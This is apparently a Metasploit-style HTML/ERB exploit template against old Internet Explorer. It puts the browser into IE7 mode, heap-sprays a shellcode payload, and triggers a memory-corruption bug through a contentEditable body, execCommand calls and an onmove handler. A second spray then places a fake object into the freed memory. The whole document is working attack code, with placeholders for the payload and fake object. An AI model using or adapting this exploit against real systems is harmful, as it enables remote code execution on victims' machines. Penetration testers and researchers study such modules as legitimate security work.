<html>
    <meta http-equiv="X-UA-Compatible" content="IE=7"/>
    <meta http-equiv="refresh" content="2"/>
    <head>
    <script language='javascript'>
    <%=js_property_spray%>

    var fake_obj = unescape("<%=js_fake_obj%>");
    var s = unescape("<%=js_payload%>");

    sprayHeap({shellcode:s});

    function setupPage() {
      document.body.style.position = 'absolute';
      document.body.contentEditable = 'true';
      document.body.style.right = '1';
    }

    function hitMe() {
      document.execCommand('SelectAll');
      document.execCommand('InsertButton');
      sprayHeap({shellcode:fake_obj, heapBlockSize:0x10});
      document.body.innerHTML = '<%=Rex::Text.rand_text_alpha(1)%>';
    }
    </script>
    </head>
    <body onload="setupPage()" onmove="hitMe()" />
    </html>